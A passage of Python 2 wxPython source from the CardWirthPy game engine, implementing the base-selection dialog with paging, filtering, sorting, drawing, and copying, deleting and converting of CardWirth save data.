def OnClickRight2Btn(self, evt):
if self._processing:
return
if self.views == 1 or evt.GetEventObject() <> self.right2btn or len(self.list) <= self.views:
Select.OnClickRight2Btn(self, evt)
return
if self.get_page() == self.get_pagecount()-1:
self.index = 0
elif len(self.list) <= self.index + self.views * self._views:
self.index = len(self.list) - 1
else:
self.index = self.index + self.views * self._views
self.index_changed()
cw.cwpy.play_sound("page")
self.draw(True)
def OnSelect(self, event):
if self._processing:
return
if not self.list:
return
if self.views == 1:
# 一件だけ表示している場合は決定
btnevent = wx.PyCommandEvent(wx.wxEVT_COMMAND_BUTTON_CLICKED, self._enterid)
self.ProcessEvent(btnevent)
else:
# 複数表示中はマウスポインタ直下を選択
mousepos = self.toppanel.ScreenToClient(wx.GetMousePosition())
size = self.toppanel.GetSize()
rw = size[0] // (self.views // self._lines)
rh = size[1] // self._lines
sindex = (mousepos[0] // rw) + ((mousepos[1] // rh) * (self.views // self._lines))
page = self.get_page()
index = page * self.views + sindex
index = min(index, len(self.list)-1)
if self.index <> index:
self.index = index
cw.cwpy.play_sound("click")
self.index_changed()
self.enable_btn()
self.draw(True)
def OnClickViewBtn(self, event):
if self._processing:
return
cw.cwpy.play_sound("equipment")
self.change_view()
self.draw(True)
self.enable_btn()
def change_view(self):
if self.views == 1:
self.views = self._views
self.viewbtn.SetLabel(cw.cwpy.msgs["member_one"])
self.save_views(True)
else:
self.views = 1
self.viewbtn.SetLabel(cw.cwpy.msgs["member_list"])
self.save_views(False)
def enable_btn(self):
pass
def get_page(self):
return self.index / self.views
def get_pagecount(self):
return (len(self.list) + self.views - 1) / self.views
def save_views(self, multi):
pass
#-------------------------------------------------------------------------------
# 宿選択ダイアログ
#-------------------------------------------------------------------------------
_okid = wx.NewId()
class YadoSelect(MultiViewSelect):
"""
宿選択ダイアログ。
"""
def __init__(self, parent):
# ダイアログボックス作成
MultiViewSelect.__init__(self, parent, cw.cwpy.msgs["select_base_title"], _okid, 6,
cw.cwpy.setting.show_multiplebases, lines=3)
self._lastbillskindir = None
self._bg = None
# 宿情報
self._names, self._list, self._list2, self._skins, self._classic, self._isshortcuts, self._imgpaths = self.get_yadolist()
self.index = 0
for index, path in enumerate(self._list):
if cw.cwpy.setting.lastyado == os.path.basename(path):
self.index = index
break
# toppanel
self.toppanel = wx.Panel(self, -1, size=cw.wins((400, 370)))
# 絞込条件
choices = (cw.cwpy.msgs["all"],
cw.cwpy.msgs["sort_name"],
cw.cwpy.msgs["member_name"],
cw.cwpy.msgs["skin"])
self._init_narrowpanel(choices, u"", cw.cwpy.setting.yado_narrowtype)
# sort
font = cw.cwpy.rsrc.get_wxfont("paneltitle2", pixelsize=cw.wins(13))
self.sort_label = wx.StaticText(self, -1, label=cw.cwpy.msgs["sort_title"])
self.sort_label.SetFont(font)
choices = (cw.cwpy.msgs["sort_no"],
cw.cwpy.msgs["sort_name"],
cw.cwpy.msgs["skin"])
self.sort = wx.Choice(self, size=(-1, cw.wins(20)), choices=choices)
self.sort.SetFont(cw.cwpy.rsrc.get_wxfont("combo", pixelsize=cw.wins(14)))
if cw.cwpy.setting.sort_yado == "Name":
self.sort.Select(1)
elif cw.cwpy.setting.sort_yado == "Skin":
self.sort.Select(2)
else:
self.sort.Select(0)
# ok
self.okbtn = cw.cwpy.rsrc.create_wxbutton(self.panel, _okid, cw.wins((50, 23)), cw.cwpy.msgs["decide"])
self.buttonlist.append(self.okbtn)
# new
self.newbtn = cw.cwpy.rsrc.create_wxbutton(self.panel, -1, cw.wins((50, 23)), cw.cwpy.msgs["new"])
self.buttonlist.append(self.newbtn)
# extension
self.exbtn = cw.cwpy.rsrc.create_wxbutton(self.panel, -1, cw.wins((50, 23)), cw.cwpy.msgs["extension"])
self.buttonlist.append(self.exbtn)
# view
s = cw.cwpy.msgs["member_list"] if self.views == 1 else cw.cwpy.msgs["member_one"]
self.viewbtn = cw.cwpy.rsrc.create_wxbutton(self.panel, -1, cw.wins((50, 23)), s)
self.buttonlist.append(self.viewbtn)
# close
self.closebtn = cw.cwpy.rsrc.create_wxbutton(self.panel, wx.ID_CANCEL, cw.wins((50, 23)), cw.cwpy.msgs["entry_cancel"])
self.buttonlist.append(self.closebtn)
# enable bottun
self.enable_btn()
# ドロップファイル機能ON
self.DragAcceptFiles(True)
# additionals
self.create_addctrlbtn(self.toppanel, self._get_bg(), cw.cwpy.setting.show_additional_yado)
sizer = wx.BoxSizer(wx.HORIZONTAL)
sizer.AddStretchSpacer(1)
sizer.Add(self.addctrlbtn, 0, wx.ALIGN_TOP, 0)
self.toppanel.SetSizer(sizer)
self.additionals.append(self.narrow_label)
self.additionals.append(self.narrow)
self.additionals.append(self.narrow_type)
self.additionals.append(self.sort_label)
self.additionals.append(self.sort)
self.update_additionals()
self.list = self._list
self.update_narrowcondition()
# layout
self._do_layout()
# bind
self._bind()
self.Bind(wx.EVT_BUTTON, self.OnOk, id=self.okbtn.GetId())
self.Bind(wx.EVT_BUTTON, self.OnClickNewBtn, self.newbtn)
self.Bind(wx.EVT_BUTTON, self.OnClickViewBtn, self.viewbtn)
self.Bind(wx.EVT_BUTTON, self.OnClickExBtn, self.exbtn)
self.Bind(wx.EVT_CHOICE, self.OnSort, self.sort)
self.Bind(wx.EVT_DROP_FILES, self.OnDropFiles)
self.toppanel.Bind(wx.EVT_LEFT_DCLICK, self.OnLeftDClick)
seq = self.accels
newcreateid = wx.NewId()
self.Bind(wx.EVT_MENU, self.OnClickNewBtn, id=newcreateid)
seq.append((wx.ACCEL_CTRL, ord('N'), newcreateid))
self.sortkeydown = []
for i in xrange(0, 9):
sortkeydown = wx.NewId()
self.Bind(wx.EVT_MENU, self.OnNumberKeyDown, id=sortkeydown)
seq.append((wx.ACCEL_CTRL, ord('1')+i, sortkeydown))
self.sortkeydown.append(sortkeydown)
self.append_addctrlaccelerator(seq)
cw.util.set_acceleratortable(self, seq)
def update_additionals(self):
Select.update_additionals(self)
cw.cwpy.setting.show_additional_yado = self.addctrlbtn.GetToggle()
def _add_topsizer(self):
nsizer = wx.BoxSizer(wx.HORIZONTAL)
nsizer.Add(self.narrow_label, 0, wx.LEFT|wx.RIGHT|wx.CENTER, cw.wins(2))
nsizer.Add(self.narrow, 1, wx.CENTER, 0)
nsizer.Add(self.narrow_type, 0, wx.CENTER|wx.EXPAND, cw.wins(3))
nsizer.Add(self.sort_label, 0, wx.LEFT|wx.RIGHT|wx.CENTER, cw.wins(3))
nsizer.Add(self.sort, 0, wx.CENTER|wx.EXPAND, 0)
self.topsizer.Add(nsizer, 0, wx.EXPAND, 0)
def _on_narrowcondition(self):
cw.cwpy.setting.yado_narrowtype = self.narrow_type.GetSelection()
self.update_narrowcondition()
self.draw(True)
def update_narrowcondition(self):
if 0 <= self.index and self.index < len(self.list):
selected = self.list[self.index]
else:
selected = None
objs = self._list_to_obj()
narrow = self.narrow.GetValue().lower()
donarrow = self.narrow.IsShown() and bool(narrow)
if donarrow:
_NARROW_ALL = 0
_NARROW_NAME = 1
_NARROW_MEMBER = 2
_NARROW_SKIN = 3
ntype = self.narrow_type.GetSelection()
ntypes = set()
if ntype == _NARROW_ALL:
ntypes.add(_NARROW_NAME)
ntypes.add(_NARROW_MEMBER)
ntypes.add(_NARROW_SKIN)
else:
ntypes.add(ntype)
seq = []
for obj in objs:
def has_advname():
for advname in obj.advnames:
if narrow in advname.lower():
return True
return False
if (_NARROW_NAME in ntypes and narrow in obj.name.lower()) or \
(_NARROW_MEMBER in ntypes and has_advname()) or \
(_NARROW_SKIN in ntypes and narrow in obj.skin.lower()):
seq.append(obj)
objs = seq
self._sort_objs(objs)
self._obj_to_list(objs)
if selected in self.list:
self.index = self.list.index(selected)
elif self.list:
self.index %= len(self.list)
else:
self.index = 0
self.enable_btn()
def _get_bg(self):
if self._bg:
return self._bg
path = "Table/Bill"
path = cw.util.find_resource(cw.util.join_paths(cw.cwpy.skindir, path), cw.cwpy.rsrc.ext_img)
self._bg = cw.util.load_wxbmp(path, can_loaded_scaledimage=True)
return self._bg
def OnKeyDown(self, event):
if event.GetKeyCode() == wx.WXK_DELETE and self.list:
return self.delete_yado()
def OnNumberKeyDown(self, event):
"""
数値キー'1'~'9'までの押下を処理する。
PlayerSelectではソート条件の変更を行う。
"""
if self._processing:
return
if self.sort.IsShown():
index = self.sortkeydown.index(event.GetId())
if index < self.sort.GetCount():
self.sort.SetSelection(index)
event = wx.PyCommandEvent(wx.wxEVT_COMMAND_CHOICE_SELECTED, self.sort.GetId())
self.ProcessEvent(event)
def OnSort(self, event):
if self._processing:
return
index = self.sort.GetSelection()
if index == 1:
sorttype = "Name"
elif index == 2:
sorttype = "Skin"
else:
sorttype = "None"
if cw.cwpy.setting.sort_yado <> sorttype:
cw.cwpy.play_sound("page")
cw.cwpy.setting.sort_yado = sorttype
self.update_narrowcondition()
self.draw(True)
def _sort_objs(self, objs):
sorttype = cw.cwpy.setting.sort_yado
if sorttype == "Name":
cw.util.sort_by_attr(objs, "name", "skin", "order", "yadodir")
elif sorttype == "Skin":
cw.util.sort_by_attr(objs, "skin", "name", "order", "yadodir")
else:
cw.util.sort_by_attr(objs, "order", "name", "skin", "yadodir")
def OnMouseWheel(self, event):
if cw.util.has_modalchild(self):
return
if self._processing:
return
if change_combo(self.narrow_type, event):
return
elif change_combo(self.sort, event):
return
else:
MultiViewSelect.OnMouseWheel(self, event)
def _list_to_obj(self):
class YadoObj(object):
def __init__(self, name, yadodir, advnames, skin, classic, isshortcut, imgpaths):
self.name = name
self.yadodir = yadodir
self.advnames = advnames
self.skin = skin
self.classic = classic
self.isshortcut = isshortcut
if isshortcut:
self.order = cw.cwpy.setting.yado_order.get(os.path.basename(isshortcut), 0x7fffffff)
else:
self.order = cw.cwpy.setting.yado_order.get(os.path.basename(yadodir), 0x7fffffff)
self.imgpaths = imgpaths
seq = []
for t in zip(self._names, self._list, self._list2, self._skins, self._classic, self._isshortcuts, self._imgpaths):
seq.append(YadoObj(*t))
return seq
def _obj_to_list(self, objs):
self.names = []
self.list = []
self.list2 = []
self.skins = []
self.classic = []
self.isshortcuts = []
self.imgpaths = []
for obj in objs:
self.names.append(obj.name)
self.list.append(obj.yadodir)
self.list2.append(obj.advnames)
self.skins.append(obj.skin)
self.classic.append(obj.classic)
self.isshortcuts.append(obj.isshortcut)
self.imgpaths.append(obj.imgpaths)
def save_views(self, multi):
cw.cwpy.setting.show_multiplebases = multi
def index_changed(self):
MultiViewSelect.index_changed(self)
self.enable_btn()
buttonlist = filter(lambda button: button.IsEnabled(), self.buttonlist)
if buttonlist:
buttonlist[0].SetFocus()
def can_clickcenter(self):
return not (self.views == 1 and self._list and not self.okbtn.IsEnabled()) and \
((self.list and self._list and os.path.isdir(self.list[self.index])) or \
(self.newbtn.IsEnabled() and not self._list))
def enable_btn(self):
# リストが空だったらボタンを無効化
if not self.list:
self.okbtn.SetLabel(cw.cwpy.msgs["decide"])
self._disable_btn((self.exbtn, self.newbtn, self.closebtn))
return
if self.classic[self.index]:
self.okbtn.SetLabel(u"変換")
else:
self.okbtn.SetLabel(cw.cwpy.msgs["decide"])
if len(self.list) <= 1:
self._enable_btn((self.rightbtn, self.right2btn, self.leftbtn, self.left2btn))
else:
self._enable_btn()
if self.list and (cw.util.exists_mutex(self.list[self.index]) or not os.path.isdir(self.list[self.index])):
self.okbtn.Disable()
def OnSelect(self, event):
if self._list:
MultiViewSelect.OnSelect(self, event)
elif self.newbtn.IsEnabled():
btnevent = wx.PyCommandEvent(wx.wxEVT_COMMAND_BUTTON_CLICKED, self.newbtn.GetId())
self.ProcessEvent(btnevent)
def OnOk(self, event):
if not self.list:
return
if not self.okbtn.IsEnabled():
return
if self.classic[self.index]:
self._convert_current()
else:
self.EndModal(wx.ID_OK)
def OnDropFiles(self, event):
paths = event.GetFiles()
for path in paths:
self.conv_yado(path)
time.sleep(0.3)
def OnClickExBtn(self, event):
"""
拡張。
"""
cw.cwpy.play_sound("click")
if self.list:
yname = self.names[self.index]
title = cw.cwpy.msgs["extension_title"] % (yname)
classic = self.classic[self.index]
hasmutexlocal = not cw.util.exists_mutex(self.list[self.index]) and os.path.isdir(self.list[self.index])
cantransfer = bool(1 < self.classic.count(False) and os.path.isdir(self.list[self.index]))
else:
title = cw.cwpy.msgs["extension_title_2"]
classic = False
hasmutexlocal = False
cantransfer = False
if cantransfer:
for i, path in enumerate(self.list):
if not self.classic[i] and cw.util.exists_mutex(path):
cantransfer = False
break
items = [
(cw.cwpy.msgs["settings"], cw.cwpy.msgs["edit_base_description"], self.rename_yado, not classic and hasmutexlocal),
(cw.cwpy.msgs["copy"], cw.cwpy.msgs["copy_base_description"], self.copy_yado, not classic and hasmutexlocal),
(cw.cwpy.msgs["transfer"], cw.cwpy.msgs["transfer_base_description"], self.trasnfer_yadodata, cantransfer),
(u"変換", u"CardWirth用の宿データをCardWirthPy用の拠点データに変換します。", self._conv_yado, not cw.util.exists_mutex(cw.tempdir_init)),
(u"逆変換", u"選択中の拠点データをCardWirth用のデータに逆変換します。", self.unconv_yado, not classic and hasmutexlocal),
(cw.cwpy.msgs["delete"], cw.cwpy.msgs["delete_base_description"], self.delete_yado, hasmutexlocal),
]
dlg = cw.dialog.etc.ExtensionDialog(self, title, items)
cw.cwpy.frame.move_dlg(dlg)
dlg.ShowModal()
dlg.Destroy()
def rename_yado(self):
"""
宿改名。
"""
if not os.path.isdir(self.list[self.index]):
return
cw.cwpy.play_sound("click")
path = self.list[self.index]
dlg = cw.dialog.create.YadoCreater(self, path)
cw.cwpy.frame.move_dlg(dlg)
if dlg.ShowModal() == wx.ID_OK:
self.update_list(dlg.yadodir, clear_narrowcondition=True)
dlg.Destroy()
def copy_yado(self):
"""
宿複製。
"""
if not os.path.isdir(self.list[self.index]):
return
cw.cwpy.play_sound("signal")
path = self.list[self.index]
yname = self.names[self.index]
s = cw.cwpy.msgs["copy_base"] % (yname)
dlg = message.YesNoMessage(self, cw.cwpy.msgs["message"], s)
cw.cwpy.frame.move_dlg(dlg)
if dlg.ShowModal() == wx.ID_OK:
if cw.util.create_mutex(u"Yado"):
try:
if cw.util.create_mutex(self.list[self.index]):
cw.util.release_mutex()
env = cw.util.join_paths(path, "Environment.xml")
data = cw.data.xml2etree(env)
name = data.gettext("Property/Name", os.path.basename(path))
name = u"コピー - %s" % (name)
if not data.find("Property/Name") is None:
data.edit("Property/Name", name)
else:
e = data.make_element("Name", name)
data.insert("Property", e, 0)
newpath = cw.binary.util.check_filename(name)
newpath = cw.util.join_paths(os.path.dirname(path), newpath)
newpath = cw.binary.util.check_duplicate(newpath)
shutil.copytree(path, newpath)
env = cw.util.join_paths(newpath, "Environment.xml")
data.write(env)
cw.cwpy.play_sound("harvest")
cw.cwpy.setting.insert_yadoorder(os.path.basename(newpath))
self.update_list(newpath)
else:
cw.cwpy.play_sound("error")
finally:
cw.util.release_mutex()
else:
cw.cwpy.play_sound("error")
dlg.Destroy()
def trasnfer_yadodata(self):
"""
宿のデータのコピー。
"""
if not os.path.isdir(self.list[self.index]):
return
if cw.util.create_mutex(u"Yado"):
try:
mutexes = 0
for path in self.list:
if cw.util.create_mutex(path):
mutexes += 1
else:
break
draw = False
try:
if mutexes <> len(self.list):
cw.cwpy.play_sound("error")
return
finally:
for i in xrange(mutexes):
cw.util.release_mutex()
path = self.list[self.index]
dirs = []
names = []
for i, dname in enumerate(self.list):
if not self.classic[i]:
dirs.append(dname)
names.append(self.names[i])
if names:
cw.cwpy.play_sound("click")
dlg = cw.dialog.transfer.TransferYadoDataDialog(self, dirs, names, path)
cw.cwpy.frame.move_dlg(dlg)
if dlg.ShowModal() == wx.ID_OK:
self.update_list(path)
dlg.Destroy()
finally:
cw.util.release_mutex()
else:
cw.cwpy.play_sound("error")
def delete_yado(self):
"""
宿削除。
"""
if not os.path.isdir(self.list[self.index]):
return
if cw.util.create_mutex(u"Yado"):
try:
if cw.util.create_mutex(self.list[self.index]):
cw.util.release_mutex()
cw.cwpy.play_sound("signal")
path = self.list[self.index]
dname = os.path.basename(path)
if self.isshortcuts[self.index]:
yname = u"%sへのショートカット" % (self.names[self.index])
else:
yname = self.names[self.index]
s = cw.cwpy.msgs["delete_base"] % (yname)
dlg = message.YesNoMessage(self, cw.cwpy.msgs["message"], s)
cw.cwpy.frame.move_dlg(dlg)
if dlg.ShowModal() == wx.ID_OK:
if self.isshortcuts[self.index]:
cw.util.remove(self.isshortcuts[self.index])
else:
cw.util.remove(path, trashbox=True)
if not self.classic[self.index]:
cw.util.remove(cw.util.join_paths(u"Data/Temp/Local", path))
cw.cwpy.play_sound("dump")
cw.cwpy.setting.yado_order.pop(dname, None)
if self.index+1 < len(self.list):
self.update_list(self.list[self.index+1])
elif 0 < self.index:
self.update_list(self.list[self.index-1])
else:
self.update_list()
dlg.Destroy()
else:
cw.cwpy.play_sound("error")
finally:
cw.util.release_mutex()
else:
cw.cwpy.play_sound("error")
def OnClickNewBtn(self, event):
"""
宿新規作成。
"""
cw.cwpy.play_sound("click")
dlg = cw.dialog.create.YadoCreater(self)
cw.cwpy.frame.move_dlg(dlg)
if dlg.ShowModal() == wx.ID_OK:
cw.cwpy.play_sound("harvest")
cw.cwpy.setting.insert_yadoorder(os.path.basename(dlg.yadodir))
self.update_list(dlg.yadodir, clear_narrowcondition=True)
dlg.Destroy()
def _conv_yado(self):
"""
CardWirthの宿データを変換。
"""
# ディレクトリ選択ダイアログ
s = (u"CardWirthの宿のデータをCardWirthPy用に変換します。" +
u"\n変換する宿のフォルダを選択してください。")
dlg = wx.DirDialog(self, s, style=wx.DD_DIR_MUST_EXIST)
dlg.SetPath(os.getcwdu())
if dlg.ShowModal() == wx.ID_OK:
path = dlg.GetPath()
dlg.Destroy()
self.conv_yado(path)
else:
dlg.Destroy()
def _convert_current(self):
if not (self.list and self.classic[self.index]):
return
yname = self.names[self.index]
s = u"%sをCardWirthPy用に変換します。\nよろしいですか?" % yname
dlg = message.YesNoMessage(self, cw.cwpy.msgs["message"], s)
self.Parent.move_dlg(dlg)
cw.cwpy.play_sound("click")
if dlg.ShowModal() == wx.ID_OK:
dlg.Destroy()
path = self.list[self.index]
self.conv_yado(path, ok=True, moveconverted=True, deletepath=self.isshortcuts[self.index])
else:
dlg.Destroy()
def draw(self, update=False):
dc = Select.draw(self, update)
if self.views <> 1 and not self._lastbillskindir is None:
skindir = self._lastbillskindir
elif self.list and self.views == 1:
skindir = self.skins[self.index]
self._lastbillskindir = skindir
else:
skindir = cw.cwpy.skindir
# 背景
path = "Table/Bill"
path = cw.util.find_resource(cw.util.join_paths(skindir, path), cw.cwpy.rsrc.ext_img)
bmp = cw.wins(cw.util.load_wxbmp(path, can_loaded_scaledimage=True))
bmpw, bmph = bmp.GetSize()
dc.DrawBitmap(bmp, 0, 0, False)
# リストが空だったら描画終了
if not self.list:
return
def get_playingbmp():
fpath = cw.util.find_resource(cw.util.join_paths(skindir, "Resource/Image/Dialog/PLAYING_YADO"), cw.M_IMG)
if os.path.isfile(fpath):
return cw.wins((cw.util.load_wxbmp(fpath, True, can_loaded_scaledimage=True),
cw.setting.SIZE_RESOURCES["Dialog/PLAYING_YADO"]))
else:
fpath = cw.util.find_resource(cw.util.join_paths(skindir, "Resource/Image/Dialog/PLAYING"), cw.M_IMG)
if os.path.isfile(fpath):
return cw.wins((cw.util.load_wxbmp(fpath, True, can_loaded_scaledimage=True),
cw.setting.SIZE_RESOURCES["Dialog/PLAYING"]))
elif "PLAYING_YADO" in cw.cwpy.rsrc.dialogs:
return cw.cwpy.rsrc.dialogs["PLAYING_YADO"]
else:
return cw.cwpy.rsrc.dialogs["PLAYING"]
cardw, cardh = cw.wins(cw.SIZE_CARDIMAGE)
if self.views == 1:
# 単独表示
if self.classic[self.index]:
# 変換が必要な場合
dc.SetFont(cw.cwpy.rsrc.get_wxfont("dlgmsg", pixelsize=cw.wins(16)))
dc.SetTextForeground(wx.RED)
s = u"変換が必要です"
w = dc.GetTextExtent(s)[0]
dc.DrawText(s, (bmpw-w)/2, cw.wins(20))
# 宿画像
imgx = (bmpw-cardw) // 2
imgy = cw.wins(70)
imgpaths = self.imgpaths[self.index]
if imgpaths:
#dc.SetClippingRegion(wx.Rect(imgx, imgy, cardw, cardh))
dc.SetClippingRect(wx.Rect(imgx, imgy, cardw, cardh))
for info in imgpaths:
if not info.path:
continue
path = cw.util.join_paths(self.list[self.index], info.path)
bmp_noscale = cw.util.load_wxbmp(path, True, can_loaded_scaledimage=True)
bmp = cw.wins(bmp_noscale)
baserect = info.calc_basecardposition_wx(bmp.GetSize(), noscale=False,
basecardtype="Bill",
cardpostype="NotCard")
dc.DrawBitmap(bmp, imgx + baserect.x, imgy + baserect.y, True)
dc.DestroyClippingRegion()
else:
path = "Resource/Image/Card/COMMAND0"
path = cw.util.find_resource(cw.util.join_paths(skindir, path), cw.cwpy.rsrc.ext_img)
bmp = cw.wins(cw.util.load_wxbmp(path, True, can_loaded_scaledimage=True))
dc.DrawBitmap(bmp, (bmpw-cw.wins(74))/2, cw.wins(65), True)
if self.isshortcuts[self.index]:
bmp = cw.cwpy.rsrc.dialogs["LINK"]
dc.DrawBitmap(bmp, imgx, imgy, True)
# 宿名前
dc.SetTextForeground(wx.BLACK)
dc.SetFont(cw.cwpy.rsrc.get_wxfont("scenario", pixelsize=cw.wins(21)))
s = self.names[self.index]
w = dc.GetTextExtent(s)[0]
# シナリオ名
maxwidth = bmpw - cw.wins(5)*2
if maxwidth < w:
cw.util.draw_witharound(dc, s, cw.wins(5), cw.wins(36), maxwidth=maxwidth)
else:
cw.util.draw_witharound(dc, s, (bmpw-w)/2, cw.wins(36))
# ページ番号
dc.SetFont(cw.cwpy.rsrc.get_wxfont("dlgtitle", pixelsize=cw.wins(14)))
s = str(self.index+1) if self.index > 0 else str(-self.index + 1)
s = s + " / " + str(len(self.list))
w = dc.GetTextExtent(s)[0]
cw.util.draw_witharound(dc, s, (bmpw-w)/2, cw.wins(340))
# Adventurers
s = cw.cwpy.msgs["adventurers"]
w = dc.GetTextExtent(s)[0]
dc.DrawText(s, (bmpw-w)/2, cw.wins(170))
# 所属冒険者
dc.SetFont(cw.cwpy.rsrc.get_wxfont("dlglist", pixelsize=cw.wins(14)))
for idx, name in enumerate(self.list2[self.index]):
if 24 <= idx:
break
if 23 == idx:
if 24 < len(self.list2[self.index]):
name = cw.cwpy.msgs["scenario_etc"]
name = cw.util.abbr_longstr(dc, name, cw.wins(90))
x = (bmpw - cw.wins(270)) / 2 + ((idx % 3) * cw.wins(95))
y = cw.wins(195) + (idx / 3) * cw.wins(16)
dc.DrawText(name, x, y)
# 使用中マーク
if cw.util.exists_mutex(self.list[self.index]):
bmp = get_playingbmp()
w, h = bmp.GetSize()
dc.DrawBitmap(bmp, (bmpw-w)//2, (bmph-h)//2, True)
else:
# 一覧表示
pindex = self.views * self.get_page()
x = 0
y = 0
aw = bmpw // 2
ah = bmph // 3
for index in xrange(pindex, min(pindex+self.views, len(self.list))):
skindir = self.skins[index]
# 宿画像
imgpaths = self.imgpaths[index]
imgx = cw.wins(5)+x
imgy = cw.wins(20)+y
if imgpaths:
#dc.SetClippingRegion(wx.Rect(imgx, imgy, cardw, cardh))
dc.SetClippingRect(wx.Rect(imgx, imgy, cardw, cardh))
for info in imgpaths:
if not info.path:
continue
path = cw.util.join_paths(self.list[index], info.path)
bmp_noscale = cw.util.load_wxbmp(path, True, can_loaded_scaledimage=True)
bmp = cw.wins(bmp_noscale)
baserect = info.calc_basecardposition_wx(bmp.GetSize(), noscale=False,
basecardtype="Bill",
cardpostype="NotCard")
dc.DrawBitmap(bmp, imgx + baserect.x, imgy + baserect.y, True)
dc.DestroyClippingRegion()
else:
path = "Resource/Image/Card/COMMAND0"
path = cw.util.find_resource(cw.util.join_paths(skindir, path), cw.cwpy.rsrc.ext_img)
bmp = cw.wins(cw.util.load_wxbmp(path, True, can_loaded_scaledimage=True))
dc.DrawBitmap(bmp, imgx, imgy, True)
if self.isshortcuts[index]:
bmp = cw.cwpy.rsrc.dialogs["LINK"]
dc.DrawBitmap(bmp, cw.wins(2)+x, cw.wins(85)+y, True)
# 宿名前
dc.SetTextForeground(wx.BLACK)
dc.SetFont(cw.cwpy.rsrc.get_wxfont("scenario", pixelsize=cw.wins(17)))
s = self.names[index]
cw.util.abbr_longstr(dc, s, aw-2)
w = dc.GetTextExtent(s)[0]
cw.util.draw_witharound(dc, s, (aw-w)//2+x, cw.wins(3)+y)
yy = cw.wins(25)
amax = 6
if self.classic[index]:
# 変換が必要な場合
dc.SetFont(cw.cwpy.rsrc.get_wxfont("dlgmsg", pixelsize=cw.wins(14)))
dc.SetTextForeground(wx.RED)
s = u"変換が必要です"
w = dc.GetTextExtent(s)[0]
dc.DrawText(s, cw.wins(84)+x, cw.wins(22)+y)
yy += cw.wins(15)
amax -= 1
# 所属冒険者
dc.SetFont(cw.cwpy.rsrc.get_wxfont("dlglist", pixelsize=cw.wins(14)))
for idx, name in enumerate(self.list2[index]):
name = cw.util.abbr_longstr(dc, name, aw-cw.wins(84)-cw.wins(2))
cw.util.draw_witharound(dc, name, cw.wins(84)+x, yy+y)
yy += cw.wins(15)
if amax-2 <= idx and amax < len(self.list2[index]):
name = cw.cwpy.msgs["scenario_etc"]
cw.util.draw_witharound(dc, name, cw.wins(84)+x, yy+y)
break
if (index-pindex) % 2 == 1:
x = 0
y += ah
else:
x += aw
# ページ番号
dc.SetFont(cw.cwpy.rsrc.get_wxfont("dlgtitle", pixelsize=cw.wins(13)))
s = u"%s/%s" % (self.get_page()+1, self.get_pagecount())
w = dc.GetTextExtent(s)[0]
cw.util.draw_witharound(dc, s, (bmpw-w)/2, cw.wins(355))
# 使用中マーク
x = 0
y = 0
for index in xrange(pindex, min(pindex+self.views, len(self.list))):
skindir = self.skins[index]
if cw.util.exists_mutex(self.list[index]):
bmp = get_playingbmp()
w, h = bmp.GetSize()
dc.DrawBitmap(bmp, (aw-w)//2+x, (ah-h)//2+y, True)
if (index-pindex) % 2 == 1:
x = 0
y += ah
else:
x += aw
# Selected
x = 0
y = 0
for index in xrange(pindex, min(pindex+self.views, len(self.list))):
if index == self.index:
bmp = cw.cwpy.rsrc.wxstatuses["TARGET"]
dc.DrawBitmap(bmp, cw.wins(158)+x, cw.wins(80)+y, True)
if (index-pindex) % 2 == 1:
x = 0
y += ah
else:
x += aw
def conv_yado(self, path, ok=False, moveconverted=False, deletepath=""):
"""
CardWirthの宿データを変換。
"""
# カードワースの宿か確認
if not os.path.exists(cw.util.join_paths(path, "Environment.wyd")):
s = u"CardWirthの宿のディレクトリではありません。"
dlg = message.ErrorMessage(self, s)
self.Parent.move_dlg(dlg)
dlg.ShowModal()
dlg.Destroy()
return
# 変換確認ダイアログ
if not ok:
cw.cwpy.play_sound("click")
s = os.path.basename(path) + u" を変換します。\nよろしいですか?"
dlg = message.YesNoMessage(self, cw.cwpy.msgs["message"], s)
self.Parent.move_dlg(dlg)
if not dlg.ShowModal() == wx.ID_OK:
dlg.Destroy()
return
dlg.Destroy()
# 宿データ
cwdata = cw.binary.cwyado.CWYado(
path, "Yado", cw.cwpy.setting.skintype)
# 変換可能なデータかどうか確認
if not cwdata.is_convertible():
s = u"CardWirth ver.1.20-1.50の宿しか変換できません。"
dlg = message.ErrorMessage(self, s)
self.Parent.move_dlg(dlg)
dlg.ShowModal()
dlg.Destroy()
return
if cw.util.create_mutex(u"Yado"):
try:
thread = cw.binary.ConvertingThread(cwdata)
thread.start()
# プログレスダイアログ表示
dlg = cw.dialog.progress.ProgressDialog(self, cwdata.name + u"の変換", "",
maximum=100)
def progress():
while not thread.complete:
wx.CallAfter(dlg.Update, cwdata.curnum, cwdata.message)
time.sleep(0.001)
wx.CallAfter(dlg.Destroy)
thread2 = threading.Thread(target=progress)
thread2.start()
self.Parent.move_dlg(dlg)
dlg.ShowModal()
yadodir = thread.path
# エラーログ表示
if cwdata.errorlog:
dlg = cw.dialog.etc.ErrorLogDialog(self, cwdata.errorlog)
self.Parent.move_dlg(dlg)
dlg.ShowModal()
dlg.Destroy()
# 変換完了ダイアログ
cw.cwpy.play_sound("harvest")
s = u"データの変換が完了しました。"
dlg = message.Message(self, cw.cwpy.msgs["message"], s, mode=2)
self.Parent.move_dlg(dlg)
dlg.ShowModal()
dlg.Destroy()
if deletepath:
cw.util.remove(deletepath)
elif moveconverted:
if not os.path.isdir(u"ConvertedYado"):
os.makedirs(u"ConvertedYado")
topath = cw.util.join_paths(u"ConvertedYado", os.path.basename(path))
topath = cw.binary.util.check_duplicate(topath)
shutil.move(path, topath)
cw.cwpy.play_sound("page")
cw.cwpy.setting.insert_yadoorder(os.path.basename(yadodir))
self.update_list(yadodir, clear_narrowcondition=True)
finally:
cw.util.release_mutex()
else:
cw.cwpy.play_sound("error")
def unconv_yado(self):
"""
CardWirthの宿データへ逆変換。
"""
yadodir = self.list[self.index]
yadoname = self.names[self.index]
# 変換確認ダイアログ
cw.cwpy.play_sound("click")
dlg = cw.dialog.etc.ConvertYadoDialog(self, yadoname)
self.Parent.move_dlg(dlg)
if not dlg.ShowModal() == wx.ID_OK:
dlg.Destroy()
return
targetengine = dlg.targetengine
dstpath = dlg.dstpath
dlg.Destroy()
try:
if not os.path.isdir(dstpath):
os.makedirs(dstpath)
except:
cw.util.print_ex()
s = u"フォルダ %s を生成できません。" % (dstpath)
dlg = message.ErrorMessage(self, s)
self.Parent.move_dlg(dlg)
dlg.ShowModal()
dlg.Destroy()
return
cw.cwpy.setting.unconvert_targetfolder = dstpath
# 宿データ
cw.cwpy.yadodir = cw.util.join_paths(yadodir)
cw.cwpy.tempdir = cw.cwpy.yadodir.replace("Yado", cw.util.join_paths(cw.tempdir, u"Yado"), 1)
try:
